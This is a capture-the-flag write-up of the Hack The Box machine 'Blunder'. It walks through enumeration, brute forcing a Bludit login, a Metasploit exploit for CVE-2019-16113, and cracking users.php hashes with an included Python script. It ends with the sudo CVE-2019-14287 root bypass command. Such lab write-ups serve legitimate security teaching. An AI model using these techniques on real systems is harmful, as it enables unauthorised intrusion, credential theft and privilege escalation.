Hack The Box — Blunder Write-up

Sometimes it is in front of your 👀 Blunder

Enumeration

Begin with

nmap -sC -sT -sV 10.10.10.191 

(default script scan, TCP connect scan and service version detection) to find the services on this machine. The only service exposed is HTTP.

Note:

  • -sC runs Nmap's default script set.
  • -sT performs a full TCP connect scan; use it when the user has no raw-packet privileges (the default -sS SYN scan needs them).
  • -sV determines service versions so they can be matched against known CVEs.

The web page

I used DirBuster to enumerate directories.

These are the results. The interesting entries are:

/todo.txt 
/robots.txt
/admin
/about
/usb

/admin is the Bludit login page, and that is the way in.

I searched GitHub for a Bludit password brute-force script. todo.txt contains "-Inform fergus that the new blog needs images — PENDING", so the username is fergus.

Bludit is a free, open-source web application for building a website or blog in seconds, with Markdown support.

Modify the Python script to read your own wordlist (wordlists.txt) and run it until it recovers the password.

Note: cewl is a custom wordlist generator. It builds the list from the words found on the target site itself, which is a good fit for a blog login.

Gaining Access

Once you have the correct password, the next step is to check whether the running Bludit version has a known CVE.

CVE-2019-16113: Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be uploaded under a .jpg file name, and that PHP code can then write other PHP code to a ../ pathname. I used the Metasploit module for this CVE.

Set the username, password and target IP, then run exploit.

Enumeration with user privilege

After I got a shell as www-data, I looked for a user password to move to a real user account.

The credentials are kept in hash form in users.php, Bludit's user database (bl-content/databases/users.php under the web root).

I cracked the hash and got Password120.

I then had to find which user Password120 belongs to. /home holds two users, hugo and shaun. hugo was the one: Password120 is his password.
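Recovering the password from users.php offline, as an added example that is not part of the write-up. It assumes Bludit's file layout (a PHP guard line followed by a JSON object with a password and salt per user) and Bludit's generatePasswordHash(), which computes sha1(password . salt); the order password-then-salt is taken from users.class.php. The sample database below is constructed: the hugo/Password120 pair follows the write-up, but the hash values are computed here and are not the ones from the box.

```python
"""Offline crack of Bludit users.php hashes with a wordlist (added example)."""
import hashlib
import json
import re
import secrets


def parse_users_php(text):
    """users.php is a JSON object behind a PHP guard line; drop the guard and load it."""
    body = re.sub(r"^\s*<\?php.*?\?>", "", text, count=1, flags=re.S)
    return json.loads(body)


def bludit_hash(password, salt):
    """Bludit's generatePasswordHash(): sha1(password . salt) (order assumed from users.class.php)."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


def crack(users, wordlist):
    """Return {username: password} for every record that a wordlist entry reproduces.

    The salted form is tried first and bare sha1(password) second: an online
    SHA-1 lookup only helps when the stored value happens to be unsalted.
    """
    found = {}
    candidates = [w.strip() for w in wordlist if w.strip()]
    for name, rec in users.items():
        target = str(rec.get("password", "")).lower()
        salt = str(rec.get("salt", ""))
        for cand in candidates:
            if bludit_hash(cand, salt) == target or bludit_hash(cand, "") == target:
                found[name] = cand
                break
    return found


# Constructed sample database (not the real file from the box). admin gets a random
# hash that no wordlist will match; hugo's is sha1("Password120" + salt).
SAMPLE_SALT = "x9q2"
SAMPLE_USERS_PHP = f"""<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{{
  "admin": {{"nickname": "Admin", "role": "admin", "password": "{secrets.token_hex(20)}", "salt": "a1b2c3"}},
  "hugo": {{"nickname": "Hugo", "role": "author", "password": "{bludit_hash('Password120', SAMPLE_SALT)}", "salt": "{SAMPLE_SALT}"}}
}}
"""


def crack_sample(wordlist):
    """Run the cracker against the constructed sample database."""
    return crack(parse_users_php(SAMPLE_USERS_PHP), wordlist)


if __name__ == "__main__":
    # usage: python3 bludit_crack.py users.php wordlist.txt
    import sys
    with open(sys.argv[1]) as db, open(sys.argv[2], encoding="utf-8", errors="ignore") as words:
        for user, pw in crack(parse_users_php(db.read()), words).items():
            print(f"{user}: {pw}")
```

Copy users.php out of the www-data shell and run the script locally; each recovered pair is then tried with su against the accounts listed in /home.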

Got user.txt!

Privilege Escalation

From Meterpreter I upgraded to a bash shell with a Python one-liner. After that I found "sudo 1.8.27 - Security Bypass" (CVE-2019-14287) on exploit-db.com.

Sudo does not check that the specified user ID exists and runs the command with whatever ID is given; -u#-1 (equivalently -u#4294967295) is turned into uid 0, so the command runs as root. This only works when a sudoers rule lets the user run the command as any user except root, e.g. (ALL, !root) /bin/bash, so check sudo -l first.

By typing

sudo -u#-1 /bin/bash 

you become root.

Got root.txt!


If my write-up is useful for you, would you mind buying me a coffee?

Cybersecurity Consultant & Penetration Tester